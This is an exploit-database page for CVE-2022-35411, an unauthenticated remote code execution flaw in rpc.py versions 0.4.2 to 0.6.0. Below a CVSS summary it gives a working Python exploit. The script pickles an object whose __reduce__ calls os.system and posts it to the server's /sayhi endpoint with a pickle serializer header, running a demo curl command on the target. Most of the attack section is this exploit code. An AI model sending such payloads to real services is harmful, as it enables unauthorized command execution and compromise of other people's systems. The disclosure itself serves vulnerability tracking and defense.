rpc.py 0.6.0 Remote Code Execution

2022.08.02
Credit: Elias Hohl
Risk: High
Local: No
Remote: Yes
CVE: CVE-2022-35411
CWE: NVD-CWE-noinfo


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 2022-07-12 # Exploit Author: Elias Hohl # Vendor Homepage: https://github.com/abersheeran # Software Link: https://github.com/abersheeran/rpc.py # Version: v0.4.2 - v0.6.0 # Tested on: Debian 11, Ubuntu 20.04 # CVE : CVE-2022-35411 import requests import pickle # Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py HOST =3D "127.0.0.1:65432" URL =3D f"http://{HOST}/sayhi" HEADERS =3D { "serializer": "pickle" } def generate_payload(cmd): class PickleRce(object): def __reduce__(self): import os return os.system, (cmd,) payload =3D pickle.dumps(PickleRce()) print(payload) return payload def exec_command(cmd): payload =3D generate_payload(cmd) requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) def main(): exec_command('curl http://127.0.0.1:4321') # exec_command('uname -a') if __name__ =3D=3D "__main__": main()


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top